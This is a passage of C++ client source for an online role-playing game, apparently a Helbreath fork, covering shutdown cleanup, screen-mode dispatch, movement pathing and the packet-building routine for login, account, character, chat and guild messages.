	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  0x30,   0x30,   0x30),  &m_wR[15], &m_wG[15], &m_wB[15]); // Black



	_LoadGameMsgTextContents();
	ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));

	return TRUE;
}

void CGame::Quit()
{int i;
	WriteSettings();
	ChangeGameMode(DEF_GAMEMODE_NULL);

	for (i = 0; i < DEF_MAXSPRITES; i++)
	if (m_pSprite[i] != NULL) delete m_pSprite[i];
	for (i = 0; i < DEF_MAXTILES; i++)
	if (m_pTileSpr[i] != NULL) delete m_pTileSpr[i];
	for (i = 0; i < DEF_MAXEFFECTSPR; i++)
	if (m_pEffectSpr[i] != NULL) delete m_pEffectSpr[i];

	for (i = 0; i < DEF_MAXSOUNDEFFECTS; i++) {
		if (m_pCSound[i] != NULL) delete m_pCSound[i];
		if (m_pMSound[i] != NULL) delete m_pMSound[i];
		if (m_pESound[i] != NULL) delete m_pESound[i];
	}

	if (m_pBGM != NULL) delete m_pBGM;

	for (i = 0; i < 4; i++)
	if (m_pCharList[i] != NULL) delete m_pCharList[i];

	for (i = 0; i < DEF_MAXITEMS; i++)
	if (m_pItemList[i] != NULL)	delete m_pItemList[i];

	for (i = 0; i < DEF_MAXBANKITEMS; i++)
	if (m_pBankList[i] != NULL)	delete m_pBankList[i];

	for (i = 0; i < DEF_MAXEFFECTS; i++)
	if (m_pEffectList[i] != NULL) delete m_pEffectList[i];

	for (i = 0; i < DEF_MAXCHATMSGS; i++)
		if (m_pChatMsgList[i] != NULL) delete m_pChatMsgList[i];

	for (i = 0; i < DEF_MAXCHATSCROLLMSGS; i++)
		if (m_pChatScrollList[i] != NULL) delete m_pChatScrollList[i];

	for (i = 0; i < DEF_MAXWHISPERMSG; i++)
		if (m_pWhisperMsg[i] != NULL) delete m_pWhisperMsg[i];

	for (i = 0; i < DEF_MAXMENUITEMS; i++)
		if (m_pItemForSaleList[i] != NULL) delete m_pItemForSaleList[i];

	for (i = 0; i < DEF_MAXMAGICTYPE; i++)
		if (m_pMagicCfgList[i] != NULL) delete m_pMagicCfgList[i];

	for (i = 0; i < DEF_MAXSKILLTYPE; i++)
		if (m_pSkillCfgList[i] != NULL) delete m_pSkillCfgList[i];

	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++) {
		if (m_pMsgTextList[i] != NULL)  delete m_pMsgTextList[i];
		if (m_pMsgTextList2[i] != NULL) delete m_pMsgTextList2[i];
		if (m_pAgreeMsgTextList[i] != NULL) delete m_pAgreeMsgTextList[i];
	}

	if (m_pExID != NULL) delete m_pExID;

	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
		if (m_pBuildItemList[i] != NULL) delete m_pBuildItemList[i];

	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
		if (m_pDispBuildItemList[i] != NULL) delete m_pDispBuildItemList[i];

	// Crafting:
	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
		if (m_pCraftItemList[i] != NULL) delete m_pCraftItemList[i];
	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
		if (m_pDispCraftItemList[i] != NULL) delete m_pDispCraftItemList[i];

	for (i = 0; i < DEF_MAXGAMEMSGS; i++)
		if (m_pGameMsgList[i] != NULL) delete m_pGameMsgList[i];

	for (i = 0; i < DEF_MAXITEMNAMES; i++)
		if (m_pItemNameList[i] != NULL) delete m_pItemNameList[i];

	delete m_pMapData;

	if (m_pGSock != NULL) delete m_pGSock;
	if (m_pLSock != NULL) delete m_pLSock;
	if (G_pCalcSocket != NULL) delete G_pCalcSocket;
	if (m_pCGameMonitor != NULL) delete m_pCGameMonitor;
}


void CGame::UpdateScreen()
{ 	G_dwGlobalTime = timeGetTime();
if (m_cGameMode != DEF_GAMEMODE_ONMAINGAME)	StopBGM(); // MP3
	switch (m_cGameMode) {
	case DEF_GAMEMODE_ONAGREEMENT:
		break;

	case DEF_GAMEMODE_ONCREATENEWACCOUNT:
		UpdateScreen_OnCreateNewAccount();
		break;

	case DEF_GAMEMODE_ONVERSIONNOTMATCH:
		UpdateScreen_OnVersionNotMatch();
		break;

	case DEF_GAMEMODE_ONCONNECTING:
		UpdateScreen_OnConnecting();
		break;

	case DEF_GAMEMODE_ONMAINMENU:
		UpdateScreen_OnMainMenu();
		break;

	case DEF_GAMEMODE_ONLOADING:
		UpdateScreen_OnLoading(TRUE);
		break;

	case DEF_GAMEMODE_ONMAINGAME:
		UpdateScreen_OnGame(); 
		break;

	case DEF_GAMEMODE_ONWAITINGINITDATA:
		UpdateScreen_OnWaitInitData();
		break;

	case DEF_GAMEMODE_ONCONNECTIONLOST:
		UpdateScreen_OnConnectionLost();
		break;

	case DEF_GAMEMODE_ONMSG:
		UpdateScreen_OnMsg();
		break;

	case DEF_GAMEMODE_ONLOGIN:
		UpdateScreen_OnLogin();
		break;

	case DEF_GAMEMODE_ONSELECTSERVER:
		UpdateScreen_OnSelectServer();
		break;

	case DEF_GAMEMODE_ONQUIT:
		UpdateScreen_OnQuit();
		break;

	case DEF_GAMEMODE_ONQUERYFORCELOGIN:
		UpdateScreen_OnQueryForceLogin();
		break;

	case DEF_GAMEMODE_ONSELECTCHARACTER:
		UpdateScreen_OnSelectCharacter();
		break;

	case DEF_GAMEMODE_ONCREATENEWCHARACTER:
		UpdateScreen_OnCreateNewCharacter();
		break;

	case DEF_GAMEMODE_ONWAITINGRESPONSE:
		UpdateScreen_OnWaitingResponse();
		break;

	case DEF_GAMEMODE_ONQUERYDELETECHARACTER:
		UpdateScreen_OnQueryDeleteCharacter();
		break;

	case DEF_GAMEMODE_ONLOGRESMSG:
		UpdateScreen_OnLogResMsg();
		break;

	case DEF_GAMEMODE_ONCHANGEPASSWORD:
		UpdateScreen_OnChangePassword();
		break;
	}
}


void CGame::CalcViewPoint()
{ short dX, dY;
	dX = m_sViewPointX - m_sViewDstX;
	dY = m_sViewPointY - m_sViewDstY;
	if (abs(dX) < abs(m_sViewDX))
	{	m_sViewPointX = m_sViewDstX;
		m_sViewDX = 0;
	}else
	{	if (dX > 0) m_sViewDX--;
		if (dX < 0) m_sViewDX++;
		if (dX == 0) m_sViewDX = 0;
		if (abs(dX) < 40) {
			if (m_sViewDX > 4)  m_sViewDX = 4;
			else if (m_sViewDX < -4) m_sViewDX = -4;
		}
		m_sViewPointX += m_sViewDX;
	}

	if (abs(dY) < abs(m_sViewDY))
	{	m_sViewPointY = m_sViewDstY;
		m_sViewDY = 0;
	}else
	{	if (dY > 0) m_sViewDY--;
		if (dY < 0) m_sViewDY++;
		if (dY == 0) m_sViewDY = 0;
		if (abs(dY) < 40) {
			if (m_sViewDY > 4)  m_sViewDY = 4;
			else if (m_sViewDY < -4) m_sViewDY = -4;
		}
		m_sViewPointY += m_sViewDY;
	}
}

void CGame::OnGameSocketEvent(WPARAM wParam, LPARAM lParam)
{int iRet;
 char * pData;
 DWORD  dwMsgSize;

	if (m_pGSock == NULL) return;

	iRet = m_pGSock->iOnSocketEvent(wParam, lParam);
	switch (iRet) {
	case DEF_XSOCKEVENT_CONNECTIONESTABLISH:
		ConnectionEstablishHandler(DEF_SERVERTYPE_GAME);
		break;

	case DEF_XSOCKEVENT_READCOMPLETE:
		pData = m_pGSock->pGetRcvDataPointer(&dwMsgSize);
		GameRecvMsgHandler(dwMsgSize, pData);
		m_dwTime = G_dwGlobalTime;
		break;

	case DEF_XSOCKEVENT_SOCKETCLOSED:
	case DEF_XSOCKEVENT_SOCKETERROR:
		ChangeGameMode(DEF_GAMEMODE_ONCONNECTIONLOST);
		delete m_pGSock;
		m_pGSock = NULL;
		break;

	case DEF_XSOCKEVENT_CRITICALERROR:
		delete m_pGSock;
		m_pGSock = NULL;
		if (G_pCalcSocket != NULL)
		{	delete G_pCalcSocket;
			G_pCalcSocket = NULL;
		}
		break;
	}
}

void CGame::RestoreSprites()
{
    for (int i = 0; i < DEF_MAXSPRITES; i++)
    if (m_pSprite[i] != NULL) m_pSprite[i]->iRestore();
}
char _tmp_cTmpDirX[9] = { 0,0,1,1,1,0,-1,-1,-1 };
char _tmp_cTmpDirY[9] = { 0,-1,-1,0,1,1,1,0,-1 };
char CGame::cGetNextMoveDir(short sX, short sY, short dstX, short dstY, BOOL bMoveCheck, BOOL bMIM)
{
 char  cDir, cTmpDir;
 int   aX, aY, dX, dY;
 int   i;
    if ((sX == dstX) && (sY == dstY)) return 0;
    dX = sX;
    dY = sY;
    if (bMIM == FALSE) // MIM Fix
         cDir = m_Misc.cGetNextMoveDir(dX, dY, dstX, dstY);
    else cDir = m_Misc.cGetNextMoveDir(dstX, dstY, dX, dY);

	if (m_cPlayerTurn == 0) {
		for (i = cDir; i <= cDir + 2;i++)
		{
			cTmpDir = i;
			if (cTmpDir > 8) cTmpDir -= 8;
			aX = _tmp_cTmpDirX[cTmpDir];
			aY = _tmp_cTmpDirY[cTmpDir];
			if (((dX + aX) == m_iPrevMoveX) && ((dY + aY) == m_iPrevMoveY) && (m_bIsPrevMoveBlocked == TRUE) && (bMoveCheck == TRUE))
			{
				m_bIsPrevMoveBlocked = FALSE;
			}
			else if (m_pMapData->bGetIsLocateable(dX + aX, dY + aY) == TRUE)
			{
				if (m_pMapData->bIsTeleportLoc(dX + aX, dY + aY) == TRUE)
				{
					return cTmpDir;

				}
				else return cTmpDir;
			}
		}
	}
	else if (m_cPlayerTurn == 1) {
		for (i = cDir; i >= cDir - 2;i--)
		{
			cTmpDir = i;
			if (cTmpDir < 1) cTmpDir += 8;
			aX = _tmp_cTmpDirX[cTmpDir];
			aY = _tmp_cTmpDirY[cTmpDir];
			if (((dX + aX) == m_iPrevMoveX) && ((dY + aY) == m_iPrevMoveY) && (m_bIsPrevMoveBlocked == TRUE) && (bMoveCheck == TRUE))
			{
				m_bIsPrevMoveBlocked = FALSE;
			}
			else if (m_pMapData->bGetIsLocateable(dX + aX, dY + aY) == TRUE)
			{
				if (m_pMapData->bIsTeleportLoc(dX + aX, dY + aY) == TRUE)
				{
					return cTmpDir;

				}
				else return cTmpDir;
			}
		}
	}
    return 0;
}


BOOL CGame::bSendCommand(DWORD dwMsgID, WORD wCommand, char cDir, int iV1, int iV2, int iV3, char * pString, int iV4)
{char  * cp, cMsg[300], cTxt[256], cKey;
 WORD  * wp;
 DWORD * dwp, dwTime;
 short * sp;
 int   * ip, iRet, i, * fightzonenum ;

	if ((m_pGSock == NULL) && (m_pLSock == NULL)) return FALSE;
	dwTime = timeGetTime();
	ZeroMemory(cMsg, sizeof(cMsg));

#ifdef DEF_ANTI_HACK
	cKey = (char)(rand() % 245) +1;
#else
	cKey = (char)(rand() % 255) +1;
#endif

	switch (dwMsgID) {

	case MSGID_REQUEST_PING:
        dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
        *dwp = dwMsgID;
        wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
        *wp = NULL;

        cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
        dwp = (DWORD *)cp;
        *dwp = dwTime;
        cp += 4;

        iRet = m_pGSock->iSendMsg(cMsg, 10, cKey);
        break;

	case DEF_REQUEST_ANGEL:	// to Game Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char*)(cMsg + 6);
		memset( cp, 0, 20 );
		memcpy((char *)cp, pString, strlen(pString) + 1);
		cp += 20;
		ip = (int *)cp;
		*ip = iV1; // Angel ID
		iRet = m_pGSock->iSendMsg(cMsg, 30, cKey);
		break;

	case MSGID_REQUEST_RESTART:
	case MSGID_REQUEST_ONLINE:
	case DEF_REQUEST_CHANGECITY_YES:
	case DEF_REQUEST_RESURRECTPLAYER_YES: // By snoopy
	case DEF_REQUEST_RESURRECTPLAYER_NO:  // By snoopy
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		iRet = m_pGSock->iSendMsg(cMsg, 6, cKey);
		break;

	case MSGID_REQUEST_HELDENIAN_SCROLL:// By snoopy
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char*)(cMsg + 6);
		memset( cp, 0, 20 );
		memcpy((char *)cp, pString, strlen(pString) + 1);
		cp += 20;
		wp = (WORD *)cp;
		*wp = wCommand; // Item ID
		iRet = m_pGSock->iSendMsg(cMsg, 28, cKey);
		break;

	case MSGID_REQUEST_TELEPORT_LIST:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char*)(cMsg + 6);
		memset( cp, 0, 20 );
		memcpy( cp, "William", 20 );
		iRet = m_pGSock->iSendMsg(cMsg, 26, cKey);
		break;

	case MSGID_REQUEST_HELDENIAN_TP_LIST: // Snoopy: Heldenian TP
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char*)(cMsg + 6);
		memset( cp, 0, 20 );
		memcpy( cp, "Gail", 20 );
		iRet = m_pGSock->iSendMsg(cMsg, 26, cKey);
		break;

	case MSGID_REQUEST_HELDENIAN_TP: // Snoopy: Heldenian TP
	case MSGID_REQUEST_CHARGED_TELEPORT:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		ip  = (int *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		*ip = iV1;
		iRet = m_pGSock->iSendMsg(cMsg, 10, cKey);
		break;

	case MSGID_REQUEST_SELLITEMLIST:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXSELLLIST; i++)
		{	*cp = m_stSellItemList[i].iIndex;
			cp++;
			ip = (int *)cp;
			*ip = m_stSellItemList[i].iAmount;
			cp += 4;
		}

		iRet = m_pGSock->iSendMsg(cMsg, 70, cKey);
		break;

	

	case MSGID_REQUEST_PANNING:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		*cp = cDir;
		cp++;

		iRet = m_pGSock->iSendMsg(cMsg, 7, cKey);
		break;

	case MSGID_REQUEST_CHANGEPASSWORD:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cNewPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cNewPassConfirm, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		iRet = m_pLSock->iSendMsg(cMsg, 46, cKey);
		break;

	case MSGID_REQUEST_CREATENEWACCOUNT:
		// to Log Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		memcpy(cp, m_cEmailAddr, 50);
		cp += 50;

		ZeroMemory(cTxt, sizeof(cTxt));
		strcpy(cTxt, " "); // gender
		memcpy(cp, cTxt, 10);
		cp += 10;

		memcpy(cp, m_cAccountAge, 10);
		cp += 10;

		memcpy(cp, " ", 4);
		cp += 4;

		memcpy(cp, " ", 2);
		cp += 2;

		memcpy(cp, " ", 2);
		cp += 2;

		memcpy(cp, m_cAccountCountry, 17);
		cp += 17;

		memcpy(cp, m_cAccountSSN, 28);
		cp += 28;

 		memcpy(cp, m_cAccountQuiz, 45);
		cp += 45;

		memcpy(cp, m_cAccountAnswer, 20);
		cp += 20;

		memcpy(cp, G_cCmdLineTokenA_Lowercase, 50);

		iRet = m_pLSock->iSendMsg(cMsg, 214	+50, cKey);
		break;

	case MSGID_GETMINIMUMLOADGATEWAY:
	case MSGID_REQUEST_LOGIN:
		// to Log Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;
		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;
		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;
		memcpy(cp, m_cWorldServerName, 30);
		cp += 30;
		iRet = m_pLSock->iSendMsg(cMsg, 56, cKey);

		break;

	case MSGID_REQUEST_CREATENEWCHARACTER:
		// to Log Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = (WORD)NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		memcpy(cp, m_cPlayerName, 10);
		cp += 10;

		memcpy(cp, m_cAccountName, 10);
		cp += 10;

		memcpy(cp, m_cAccountPassword, 10);
		cp += 10;

		memcpy(cp, m_cWorldServerName, 30);
		cp += 30;

		*cp = m_cGender;
		cp++;

		*cp = m_cSkinCol;
		cp++;

		*cp = m_cHairStyle;
		cp++;

		*cp = m_cHairCol;
		cp++;

		*cp = m_cUnderCol;
		cp++;

		*cp = m_ccStr;
		cp++;

		*cp = m_ccVit;
		cp++;

		*cp = m_ccDex;
		cp++;

		*cp = m_ccInt;
		cp++;

		*cp = m_ccMag;
		cp++;

		*cp = m_ccChr;
		cp++;

		iRet = m_pLSock->iSendMsg(cMsg, 77, cKey);
		break;

	case MSGID_REQUEST_ENTERGAME:
		// to Log Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = (WORD)m_wEnterGameType;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cPlayerName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.43
		memcpy(cTxt, m_cMapName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ip = (int *)cp;
		*ip = m_iLevel;
		cp += 4;

		memcpy(cp, m_cWorldServerName, 30);
		cp += 30;

		memcpy(cp, G_cCmdLineTokenA, 120);
		cp += 120;

		iRet = m_pLSock->iSendMsg(cMsg, 200, cKey);
		break;

	case MSGID_REQUEST_DELETECHARACTER:
		// to Log Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = (WORD)m_wEnterGameType;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		memcpy(cp, m_pCharList[m_wEnterGameType - 1]->m_cName, 10);
		cp += 10;

		memcpy(cp, m_cAccountName, 10);
		cp += 10;

		memcpy(cp, m_cAccountPassword, 10);
		cp += 10;

		memcpy(cp, m_cWorldServerName, 30);
		cp += 30;

		iRet = m_pLSock->iSendMsg(cMsg, 66, cKey);
		break;

	case MSGID_REQUEST_SETITEMPOS:
		// to Game Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		*cp = cDir;

		cp++;

		sp = (short *)cp;
		*sp = (short)iV1;
		cp += 2;

		sp = (short *)cp;
		*sp = (short)iV2;
		cp += 2;

		iRet = m_pGSock->iSendMsg(cMsg, 11);
		break;

	case MSGID_COMMAND_CHECKCONNECTION:
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);

		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		dwp = (DWORD *)cp;

#ifdef DEF_ANTI_HACK
		*dwp = (DWORD) iV1;
		//CheckProcesses(); // Bloque simplement les mouvements.
		// Mais la detection de la fentre correspondante, blocquera le CCM et -> lag / deco par serveur.
#else
		*dwp = dwTime;
#endif

		cp += 4;
		iRet = m_pGSock->iSendMsg(cMsg, 10, cKey);

		break;

	case MSGID_REQUEST_INITDATA:
	case MSGID_REQUEST_INITPLAYER:
		// to Game Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, m_cPlayerName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		*cp = (char)m_bIsObserverMode;
		cp++;

		// v2.04 Gateway
		memcpy(cp, m_cGameServerName, 20);
		cp += 20;

		iRet = m_pGSock->iSendMsg(cMsg, 37 +21, cKey);

		break;
	
	case MSGID_LEVELUPSETTINGS:
		// sleeq - fix for negative level up points
		dwp = (DWORD*)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp = (WORD*)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char*)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		sp = (short*)cp;
		*sp = (short)m_cLU_Str;
		cp += 2;

		sp = (short*)cp;
		*sp = (short)m_cLU_Vit;
		cp += 2;

		sp = (short*)cp;
		*sp = (short)m_cLU_Dex;
		cp += 2;

		sp = (short*)cp;
		*sp = (short)m_cLU_Int;
		cp += 2;

		sp = (short*)cp;
		*sp = (short)m_cLU_Mag;
		cp += 2;

		sp = (short*)cp;
		*sp = (short)m_cLU_Char;
		cp += 2;

		iRet = m_pGSock->iSendMsg(cMsg, 6 + 12);
		break;

	case MSGID_COMMAND_CHATMSG:
		if (m_bIsTeleportRequested == TRUE) return FALSE;

		// to Game Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = NULL;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		sp = (short *)cp;
		*sp = m_sPlayerX;
		cp += 2;

		sp = (short *)cp;
		*sp = m_sPlayerY;
		cp += 2;

		memcpy(cp, m_cPlayerName, 10);
		cp += 10;

		*cp = (char)iV1;
		cp++;

		if (bCheckLocalChatCommand(pString) == TRUE) return FALSE;
		memcpy((char *)cp, pString, strlen(pString) + 1);

		iRet = m_pGSock->iSendMsg(cMsg, 22 + strlen(pString));
		break;

	case MSGID_COMMAND_COMMON:
		if (m_bIsTeleportRequested == TRUE) return FALSE;
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = wCommand;
		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		*sp = m_sPlayerX;
		cp += 2;
		sp = (short *)cp;
		*sp = m_sPlayerY;
		cp += 2;
		*cp = cDir;
		cp++;
		switch (wCommand) {
		case DEF_COMMONTYPE_BUILDITEM:
			memcpy(cp, pString, 20);
			cp += 20;
			*cp = (char)m_stDialogBoxInfo[26].sV1;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV2;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV3;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV4;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV5;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV6;
			cp++;
			iRet = m_pGSock->iSendMsg(cMsg, 37);
			break;

		case DEF_COMMONTYPE_REQ_CREATEPORTION:
			*cp = (char)m_stDialogBoxInfo[26].sV1;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV2;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV3;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV4;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV5;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV6;
			cp++;
			iRet = m_pGSock->iSendMsg(cMsg, 18);
			break;

		//Crafting
		case DEF_COMMONTYPE_CRAFTITEM:
			memcpy(cp, "                    ", 20);
			cp += 20;
			*cp = (char)m_stDialogBoxInfo[26].sV1;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV2;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV3;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV4;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV5;
			cp++;
			*cp = (char)m_stDialogBoxInfo[26].sV6;
			cp++;
			iRet = m_pGSock->iSendMsg(cMsg, 37);
			break;

		// Create Slate Request - Diuuude
		case DEF_COMMONTYPE_REQ_CREATESLATE:
			*cp = (char)m_stDialogBoxInfo[40].sV1;
			cp++;
			*cp = (char)m_stDialogBoxInfo[40].sV2;
			cp++;
			*cp = (char)m_stDialogBoxInfo[40].sV3;
			cp++;
			*cp = (char)m_stDialogBoxInfo[40].sV4;
			cp++;
			*cp = (char)m_stDialogBoxInfo[40].sV5;
			cp++;
			*cp = (char)m_stDialogBoxInfo[40].sV6;
			cp++;
			iRet = m_pGSock->iSendMsg(cMsg, 18);
			break;

		default:
			if (pString == NULL)
			{	ip = (int *)cp;
				*ip = iV1;
				cp += 4;
				ip = (int *)cp;
				*ip = iV2;
				cp += 4;
				ip = (int *)cp;
				*ip = iV3;
				cp += 4;
				dwp = (DWORD *)cp;
				*dwp = dwTime;
				cp += 4;
				iRet = m_pGSock->iSendMsg(cMsg, 23 +4);
			}else
			{	ip = (int *)cp;
				*ip = iV1;
				cp += 4;
				ip = (int *)cp;
				*ip = iV2;
				cp += 4;
				ip = (int *)cp;
				*ip = iV3;
				cp += 4;
				memcpy(cp, pString, 30);
				cp += 30;
				ip = (int *)cp;
				*ip = iV4;
				cp += 4;
				iRet = m_pGSock->iSendMsg(cMsg, 23 + 34);
			}
			break;
		}

		break;

	case MSGID_REQUEST_CREATENEWGUILD:
	case MSGID_REQUEST_DISBANDGUILD:
		// to Game Server
		dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
		*dwp = dwMsgID;
		wp  = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
		*wp = DEF_MSGTYPE_CONFIRM;

		cp = (char *)(cMsg + DEF_INDEX2_MSGTYPE + 2);

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cPlayerName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountName, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;

		ZeroMemory(cTxt, sizeof(cTxt)); // v1.4
		memcpy(cTxt, m_cAccountPassword, 10);
		memcpy(cp, cTxt, 10);
		cp += 10;
		char cTemp[21];
		ZeroMemory(cTemp, sizeof(cTemp));
		memcpy(cTemp, m_cGuildName, 20);
		m_Misc.ReplaceString(cTemp, ' ', '_');
		memcpy(cp, cTemp, 20);
		cp += 20;

